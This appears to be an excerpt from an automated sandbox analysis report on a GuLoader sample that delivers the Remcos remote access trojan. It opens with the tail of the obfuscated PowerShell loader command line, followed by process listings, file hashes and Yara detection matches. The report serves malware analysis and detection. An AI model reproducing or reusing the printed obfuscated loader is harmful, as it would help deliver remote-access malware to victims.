ilsH weeReacaKvardExoreInddr acosUd n[Syda$fjerGPersyelsalSe edSponiGr ngKorth egneVided nsee uldrBest] Una=over$Top CLambhBogsoChorr MireAilumDa aeSpekn');$Karaffelen=raspite 'gene$CyklKDatanHumoipr.spUrcel ConiBearn Se.gTv,nsReprkS iajForkoSko,lTe teTempnKvarstids.SlagDStimoOli wSkran ontlOligoArtiaU,gedIntwF TariSupel Fa eObs (Shel$XiphRU reeTil,aD bocDdnic LivebutnpHimmt DiveUnhod R.v, Kal$.aleM DiteTranrcre kgrunaNonbn BantTrani TrilSa eiForbsB lle GatrEx eiTrann ShagombyePopurBygms mph)';$Merkantiliseringers=$Growled96;Xanthorrhiza (raspite 'Opp,$FinaGHi,llcrawO TriB h saBiblLtri :gra rChikikrantHef,UKat,aGrinl.estI f isfearETestrobe e P.c=Gr e(Pil.TPr dE .pfs soctisod-CadepBoykASievtPsych Pro Vibr$O,maMSympe PlaRUns k I tA Co N AuktNon.iKaprlT.rnIStenScockeEkspRPos,i .itnParkgbad eOnobRPl tsHjre)');while (!$Ritualisere) {Xanthorrhiza (raspite ' Ta $Resig MaclS.rfo.lotbAppraNrdelKnu,: epoKBlijaBlenrPoacaAuthvLandaOch nNardeart rDeth=Etym$flatHP.rtu PanmHaggaG nsnHr cicirko storU.dea') ;Xanthorrhiza $Karaffelen;Xanthorrhiza (raspite 'Effe[bralTErhvH RidrCoene Ga.aprecd PerIA ernGemiG Dum. 
drTVerdh OutRBevaeSystAPublDPhth]Timo:Cha : AdosSymjLUnvoEUddee ngPTili(Udfo4Bo.c0.est0Anti0Halv)');Xanthorrhiza (raspite ' U d$ esgBri.L EleOLunhB T,oAHaleLD ab:As eRSubciForbTFjeluElb.AUnliLConvIforbS G,nefor.rRo,ee,ran=Inte(Hot,tPeneELaans Alktlupa- romPK meAGenkTPolyhP um Rade$MaddmBadeEProsrHa pkD apaslagNPeratsiveIBal.lyaw IUngpsUdsgeSoutr inei irkn GasgMellESa mRFugtscomm)') ;Xanthorrhiza (raspite 'Samm$ DrvGN ctlH aloScioBCasta verLRibo:FordlTrisYS.reSBumsaCo vA AfkRL njeScatN.yheeLind=Indp$N,rmgYam lEm lOBedrbP,icAFor,LTy.i:Tan EArtirBrasSR prtLastA Ur TCoupn MeniPopunCacaGFr.nSTottVH lvA nadNvirgdCynoEDeset NonS oru+Borg+Run.% Sej$MyceE nterCaumyRun,tSo,rhShasRSemioCoueC BoryFullT tapESlagSWe,d.SleeCSn roCompUResan arnT') ;$Reaccepted=$Erythrocytes[$Lysaarene]}$Svingfjer=356763;$Gastroenterocolostomy=30418;Xanthorrhiza (raspite 'triu$ApotGFootLFlyvOSiftbUnthaTykmLCate:AcoebAer OHulvB DefEOpkosRobet H py etrRTvanefje RAr enForaeTe tsKali penu= Iri TrangVel eAmalTAlth- RhuCS.ooOph enethnt orseBillNReleTCa a Ps u$CampmUnnaEDe,irDisakSacraFinaNTintTF eri,nopLkrani remSHeavEcoilrDetaiPredn.olkGFor ETts.RDkvas');Xanthorrhiza (raspite 'Tran$T.legDek lGodkoJymobBondaT pal Skr:StemUBor nRetspK llrgaa o UtavB,rbeFrerrdemobDenaiInteaMandlCo,tlOut yFjsi2Non 4Nonp Abra=Ca.a Lo,o[ BurSBestyPachs UdktFolkeKikkmT.sp.FileCSnowoKlatnRkesvTerteFo.orAfprt d m]Kart:unde: DamFSworrSupeoOpremS.riB Bu a HoesSie eBorg6Diss4Hym S tratungarBelliAl entragg yvi(Arbe$BegrBF ntokopubIm,re Subs D,ltus nyHkker eleeDatarUnd.n ,kse alasK an)');Xanthorrhiza (raspite 'Pasn$AfprGCro l ingoMarkbWolfALongL Ml : U oScurtK CabEAmphPWofuTOps.iTrojkDysteFyl rHypeNTorpEDess Fors=Ophi Per[ Kurs G ay Tr.SDr.rT AudEIntrmRati.HammTOv rEPantXKnhaT re.Ato.E ResNSelec Va,oSkemD I li Pern.estGNedf]P as:Unep:KanaaUmensForsCD.sqiCoffiefte.C nvG F,rE oenTProts kedtContrKnsrICen N tarGSpad(Sulp$S laU I dnUnd pRe,erEag o,erkVMilleGrdaRDinnBPaasiLannA SceLProsLB.gbY eun2Tank4Disk)');Xanthorrhiza (raspite ' 
Ban$overGMassLKrydoOverbTentaFil LHo.e:CaecaCampNSammAVikaRKoldIDestTUds H tedICentALune=Vivi$genssForsk Lare GylpEtnoTAl mIMausK,ulkeSuper ejnDespEHol .LedvsArgyU fa.bCoe.SKeysTAntiRvelmIN nfn runG ede( Jig$Thu sHamaVNontIFr bnforhGT.arfBan JToole SmerEury,Bet $D.vig uezabeshs ettt,iderHi toSterE D unCairT TvieDiodrUdvaoHeteC ForoKontL Ta.OBoykS enTFodrO GulM P eYPast)');Xanthorrhiza $anarithia;"
                                                                Imagebase:0x580000
                                                                File size:433'152 bytes
                                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000008.00000002.2006537244.0000000008750000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000008.00000002.1971298491.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.2006894025.000000000B775000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:9
                                                                Start time:15:37:59
                                                                Start date:10/03/2025
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff7e2000000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:12
                                                                Start time:15:38:41
                                                                Start date:10/03/2025
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                Imagebase:0x430000
                                                                File size:59'904 bytes
                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.2222859365.00000000075BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000C.00000002.2198489386.0000000005FF5000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:16
                                                                Start time:15:39:06
                                                                Start date:10/03/2025
                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\System32\msiexec.exe"
                                                                Imagebase:0x430000
                                                                File size:59'904 bytes
                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true
